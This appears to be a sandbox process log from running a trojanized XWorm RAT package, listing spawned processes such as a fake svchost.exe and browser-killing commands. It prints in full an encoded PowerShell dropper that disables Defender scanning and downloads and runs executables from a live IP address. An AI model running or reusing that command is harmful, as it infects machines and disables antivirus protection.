8ACMAYgBkAHIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcQBpAHgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHYAaQB1ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAE0AcwBjAG8AbgBmAC4AZQB4AGUAJwApADwAIwBhAGIAaAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBuAGsAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZgBwAHQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBvAGYAdABwAHIAbwB0AGUAYwB0AC4AYgBhAHQAJwApADwAIwB4AGoAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBrAGIAaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABxAHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbQBzAHYAYwBwAC4AZQB4AGUAJwApADwAIwBuAGEAZQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBpAGwAZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZgBtAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABMAC4AZQB4AGUAJwApADwAIwBrAG0AcQAjAD4A"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#nci#>[System.Windows.Forms.MessageBox]::Show('Injection failed! You must run this software as Admin!','','OK','Warning')<#nqz#>;

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main\XWorm-Remote-Access-Tool-main\XWorm.exe

"C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main\XWorm-Remote-Access-Tool-main\XWorm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAcwBlACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AYwBpACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAGoAZQBjAHQAaQBvAG4AIABmAGEAaQBsAGUAZAAhACAAWQBvAHUAIABtAHUAcwB0ACAAcgB1AG4AIAB0AGgAaQBzACAAcwBvAGYAdAB3AGEAcgBlACAAYQBzACAAQQBkAG0AaQBuACEAJwAsACcAJwAsACcATwBLACcALAAnAFcAYQByAG4AaQBuAGcAJwApADwAIwBuAHEAegAjAD4AOwAiADsAPAAjAHkAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQB4AHYAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAawBxAHAAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADkANQAuADMALgAyADIAMwAuADIAMwA0AC8AeQBlAGwAbABvAHcALgBlAHgAZQAnACwAIAA8ACMAcABsAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAHAAaAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBlAGEAYwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBNAHMAYwBvAG4AZgAuAGUAeABlACcAKQApADwAIwBqAHMAdQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADUALgAzAC4AMgAyADMALgAyADMANAAvAGEAdgBkAGkAcwBhAGIAbABlAC4AYgBhAHQAJwAsACAAPAAjAG4AYwB5ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeQB1AHUAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB2AHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBvAGYAdABwAHIAbwB0AGUAYwB0AC4AYgBhAHQAJwApACkAPAAjAGcAZwB6ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADkANQAuADMALgAyADIAMwAuADIAMwA0AC8ATQBQAFMAVgBDAC4AZQB4AGUAJwAsACAAPAAjAGIAegBzACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbABzAGkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcgBlAHQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbQBzAHYAYwBwAC4AZQB4AGUAJwApACkAPAAjAG4AYwBsACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADkANQAuADMALgAyADIAMwAuADIAMwA0AC8AUABMAFYALgBlAHgAZQAnACwAIAA8ACMAZQBkAGsAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB2AGIAeAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHEAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBQAEwALgBlAHgAZQAnACkAKQA8ACMAYgBkAHIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcQBpAHgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHYAaQB1ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAE0AcwBjAG8AbgBmAC4AZQB4AGUAJwApADwAIwBhAGIAaAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBuAGsAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZgBwAHQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBvAGYAdABwAHIAbwB0AGUAYwB0AC4AYgBhAHQAJwApADwAIwB4AGoAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBrAGIAaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABxAHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbQBzAHYAYwBwAC4AZQB4AGUAJwApADwAIwBuAGEAZQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBpAGwAZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZgBtAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABMAC4AZQB4AGUAJwApADwAIwBrAG0AcQAjAD4A"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#nci#>[System.Windows.Forms.MessageBox]::Show('Injection failed! You must run this software as Admin!','','OK','Warning')<#nqz#>;

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7020 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6952 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3784 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1956 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7064 /prefetch:1

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6892 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6900 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5312 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6324 /prefetch:1

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7460 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7540 /prefetch:8

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6128 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6348 /prefetch:1

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8184 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8176 /prefetch:1

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe

"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7528 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8040 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:1

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7112 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6812 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3572 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7128 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7828 /prefetch:1

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6460 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4788 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7960 /prefetch:1

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\Pictures\b3ownddosser.exe

"C:\Users\Admin\Pictures\b3ownddosser.exe"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" H5IP9K 127.0.0.1 8001 PGVEIX

C:\Users\Admin\Pictures\b3ownddosser.exe

"C:\Users\Admin\Pictures\b3ownddosser.exe"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" H5IP9K 127.0.0.1 8001 PGVEIX

C:\Users\Admin\Pictures\b3ownddosser.exe

"C:\Users\Admin\Pictures\b3ownddosser.exe"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" H5IP9K 127.0.0.1 8001 PGVEIX

C:\Users\Admin\Pictures\b3ownddosser.exe

"C:\Users\Admin\Pictures\b3ownddosser.exe"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" H5IP9K 127.0.0.1 8001 PGVEIX

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" H5IP9K 127.0.0.1 8001 PGVEIX

C:\Users\Admin\Pictures\b3ownddosser.exe

"C:\Users\Admin\Pictures\b3ownddosser.exe"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" H5IP9K 127.0.0.1 8001 PGVEIX

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe

"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"

C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe

"C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpDF3E.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpDF3E.tmp.bat

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 6544"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe

"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe"

C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe

"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"

C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe

"C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Fixer.bat" "

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp46A.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp46A.tmp.bat

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 5588"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe

"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe"

C:\Windows\system32\lodctr.exe

lodctr /r

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC-Client.exe

"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC-Client.exe"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 2EA4LO 127.0.0.1 8000 Q4JNC5

C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe

"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe"

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC-Client.exe

"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC-Client.exe"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 2EA4LO 127.0.0.1 8000 Q4JNC5

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 2EA4LO 127.0.0.1 8000 Q4JNC5

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c taskkill /F /IM brave.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c taskkill /F /IM chrome.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c taskkill /F /IM msedge.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c taskkill /F /IM firefox.exe

C:\Windows\SysWOW64\cmd.exe

